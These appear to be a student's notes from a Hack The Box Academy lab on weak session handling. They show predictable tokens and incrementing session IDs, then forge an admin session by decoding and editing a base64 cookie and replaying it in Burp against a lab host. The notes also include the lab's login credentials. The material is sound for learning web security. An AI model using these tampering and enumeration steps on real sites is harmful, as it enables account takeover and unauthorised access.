IDENTIFICATION
HARDCODED PREPENDED & APPENDED VALUES
#sufficient length, but consists of hardcoded prepended and appended values, so the effective entropy is far lower than the token length suggests
2c0c58b27c71a2ec5bf2b4 b6e8 92b9f9
2c0c58b27c71a2ec5bf2b4 5460 92b9f9
2c0c58b27c71a2ec5bf2b4 97f5 92b9f9
2c0c58b27c71a2ec5bf2b4 8bcf 92b9f9
2c0c58b27c71a2ec5bf2b4 735e 92b9f9
* The session tokens consist of the static string 2c0c58b27c71a2ec5bf2b4, followed by four random characters, followed by the static string 92b9f9; only the four middle characters vary between sessions
INCREMENTING SESSION PATTERN
#incrementing session identifier
141233
141234
141237
141238
141240
* this makes enumeration of all past and future sessions trivial, since a valid identifier reveals the neighbouring ones
BASE64 ENCODED (DECODING)
#base64 encoded
dXNlcj1odGItc3RkbnQ7cm9sZT11c2Vy
root@oco:~$ echo -n dXNlcj1odGItc3RkbnQ7cm9sZT11c2Vy | base64 -d
user=htb-stdnt;role=user
* this cookie contains information about the user and the role tied to the session. However, base64 is an encoding rather than encryption or a signature, so there is no security measure in place that prevents tampering with the data
root@oco:~$ echo -n 'user=htb-stdnt;role=admin' | base64
dXNlcj1odGItc3RkbnQ7cm9sZT1hZG1pbg==
BURP > Repeater
Request
...
GET /admin.php HTTP/1.1
Host: session.htb
Cookie: session=dXNlcj1odGItc3RkbnQ7cm9sZT1hZG1pbg%3d%3d
Response
...
HTTP/1.1 200 OK
...
HEX ENCODED (DECODING)
#hex-encoded
Set-Cookie: session=757365723d6874622d7374646e743b726f6c653d75736572
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
username field: htb-stdnt
password field: AcademyStudent!
* submit the expected credentials so the login response and its Set-Cookie header can be observed
BURP > Repeater
Request
...
POST /index.php HTTP/1.1
Host: session.htb
Origin: http://83.136.254.158:52415
Content-Type: application/x-www-form-urlencoded
Referer: http://83.136.254.158:52415/index.php
username=htb-stdnt&password=AcademyStudent%21
Response
...
HTTP/1.1 302 Found
Date: Thu, 26 Dec 2024 00:29:27 GMT
Server: Apache/2.4.59 (Debian)
Set-Cookie: session=757365723d6874622d7374646e743b726f6c653d75736572
Location: /admin.php
...
root@oco:~$ echo -n 757365723d6874622d7374646e743b726f6c653d75736572 | xxd -r -p
user=htb-stdnt;role=user